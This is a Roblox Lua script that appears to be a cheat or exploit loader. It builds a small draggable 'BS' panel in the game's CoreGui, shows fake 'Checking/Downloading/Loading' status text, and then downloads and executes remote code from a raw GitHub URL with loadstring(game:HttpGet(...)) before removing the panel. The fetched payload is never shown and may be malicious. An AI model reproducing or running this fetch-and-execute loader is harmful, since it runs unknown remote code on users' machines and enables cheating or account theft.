local ConnectoR = Instance.new("ScreenGui")
local Connector = Instance.new("Frame")
local Corner = Instance.new("UICorner")
local BS = Instance.new("TextLabel")
local Animated = Instance.new("TextLabel")

--Properties:

ConnectoR.Name = "ConnectoR"
ConnectoR.Parent = game.CoreGui

Connector.Name = "Connector"
Connector.Parent = ConnectoR
Connector.BackgroundColor3 = Color3.fromRGB(21, 20, 20)
Connector.BorderColor3 = Color3.fromRGB(0, 0, 0)
Connector.BorderSizePixel = 0
Connector.Position = UDim2.new(0.403793275, 0, 0.374074072, 0)
Connector.Size = UDim2.new(0, 245, 0, 203)
Connector.Active = true
Connector.Draggable = true

Corner.Name = "Corner"
Corner.Parent = Connector

BS.Name = "BS"
BS.Parent = Connector
BS.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
BS.BackgroundTransparency = 1.000
BS.BorderColor3 = Color3.fromRGB(0, 0, 0)
BS.BorderSizePixel = 0
BS.Position = UDim2.new(0.0572430044, 0, 0.0648522601, 0)
BS.Size = UDim2.new(0, 53, 0, 35)
BS.Font = Enum.Font.FredokaOne
BS.Text = "BS"
BS.TextColor3 = Color3.fromRGB(81, 77, 77)
BS.TextSize = 53.000
BS.TextXAlignment = Enum.TextXAlignment.Left

Animated.Name = "Animated"
Animated.Parent = Connector
Animated.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Animated.BackgroundTransparency = 1.000
Animated.BorderColor3 = Color3.fromRGB(0, 0, 0)
Animated.BorderSizePixel = 0
Animated.Position = UDim2.new(0.400000006, 0, 0.448275864, 0)
Animated.Size = UDim2.new(0, 34, 0, 21)
Animated.Font = Enum.Font.SourceSans
Animated.Text = "p1100"
Animated.TextColor3 = Color3.fromRGB(184, 184, 184)
Animated.TextSize = 14.000

-- Scripts:

local function BUQPL_fake_script() -- Animated.LocalScript 
	local script = Instance.new('LocalScript', Animated)

	script.Parent.Text = "Checking"
	wait(1.0)
	script.Parent.Text = "Downloading"
	wait(1.0)
	script.Parent.Text = "Loading"
	wait(1.0)
	loadstring(game:HttpGet("https://raw.githubusercontent.com/ua835818/3_135I391491394/main/V3LDR_31858134891388314", true))()
	game.CoreGui.ConnectoR:Destroy()
end
coroutine.wrap(BUQPL_fake_script)()
